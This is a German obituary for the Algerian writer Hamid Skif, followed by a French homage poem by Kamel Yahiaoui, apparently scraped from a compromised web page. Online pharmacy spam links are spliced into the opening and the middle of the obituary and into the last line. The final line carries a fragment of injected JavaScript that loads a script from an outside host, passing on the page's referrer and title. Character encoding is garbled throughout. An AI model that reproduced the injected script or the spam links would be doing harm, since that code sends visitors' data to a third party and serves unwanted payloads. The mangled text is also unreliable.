online online http://www.zombiecommand.com/zombies/purchase-lisinopril/ Buy Buy online buy erexor capsules ai??zDu hast gegebenai??? (1). Ein Nachruf auf Hamid Skif

Am 18. MAi??rz verstarb der in Hamburg lebende algerische Schriftsteller, Dichter und Journalist Hamid Skif kurz vor seinem 60. Geburtstag.

Bereits mit 20 Jahren gehAi??rte er zu den bekanntesten Dichtern seines Landes. Er war dem Theater zugeneigt, schrieb die ersten StA?cke und gehAi??rte zum Kreis von Kateb Yacine, in den Siebziger machte er als Rebellendichter http://dbspithoragarh.org/how-much-endep-for-anxiety/ Cheap purchase cafergot tablet aufsatzschreibendienst.de von sich Reden. Ai??Das Regime beargwAi??hnte sein kritisches Engagement als Journalist, und versuchte ihn durch Versetzungen und Verhaftungen zu zAi??hmen. In den 1990er Jahren, als die militAi??rischen Auseinandersetzungen zwischen den bewaffneten Islamisten und der Armee tobten, denen auch zahlreiche Intellektuelle zum Opfer fielen, entkam er nur knapp mehreren Attentaten. 1995 erhielt er ein Stipendium der Ai??Heinrich-BAi??ll-Stiftung, 1998 folgte er der Einladung der Hamburger Stiftung fA?r politisch Verfolgte. In Hamburg grA?ndete er das interkulturelle Zentrum Alifma e.V., das den Dialog zwischen dem Maghreb und dem deutschsprachigen RaumAi?? fAi??rdert und zur AnnAi??herung der deutschen und arabischen Kultur beitrAi??gt.

2005 erhielt er fA?r seinen 2003 bei der Ai??Edition KAi??ln erschienen Roman ai??zSehr geehrter Herr PrAi??sidentai??? den Preis ai??zLiteratur im Exil der Stadt Heidelbergai??? .Ai?? Der Maghrebtag, der erstmals 2007 im Rahmen der jAi??hrlich stattfindenden Heidelberger Literaturtage begangen wurde, geht auf eine Initiative von Hamid Skif zurA?ck.

Er schrieb vom Exil und vom Zerrissensein, und bezeichnete sich selbst als Exilanten in der eigenen Heimat, in der jede vernA?nftige Kommunikation unmAi??glich ist.

Viele seiner BA?cher erschienen zuerst in Deutschland, bevor sie der algerischen Leserschaft in franzAi??sischer Sprache zugAi??nglich waren.

(1) Titel eines seiner Gedichte

Eine Homage an Hamid Skif, geschrieben von Kamel Yahiaoui

il pleut

Il pleut des perles sur le parvis de l’exil

il pleut des cendres sur le cAi??ur reprisAi??

il pleut des falaises sur les yeux dAi??lassAi??s

la pluie s’entasse au lever du printemps

la pluie caresse les mamelles de l’aube

la pluie fond dans une riviA?re couleuvrine

coule un visage sur un mur

court une main derriA?re un geste

brule une larme sur la joue d’une plume

il essore la plaie Ai??au centre du poumon

il chavire dans un ciel natif

il Ai??pluche Ai??la peau de la nuit sur un papier

tombe l’arc en ciel sur sa marche

lui donne la lampe du chemin

il franchit la grotte du chagrin

le poA?te Ai??saisit la trace de demain

et fume la grisaille conjuguAi??e Ai?? l’infinitif

il peint l’astre nu au milieu du voyage

sous la pluie il avance sans peur

sa lumiA?re lui tien la route du chromas

il placarde chaque trace sur son passage

arrive sa bien aimAi??e ensanglantAi??e

dans ses bras la grA?le Ai??s’Ai??croule chevesne

Skif l’accueille dans sa mAi??moire Ai??rebelle

le danger scande la pointure du poA?me

comme une lentille naissante dans la plaie d’espoir

Kamel Yahiaoui, Jahrgang 1966, ist Maler, Bildhauer und Dichter. Er lebt in Pariss.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; tegretol for impulse control disorder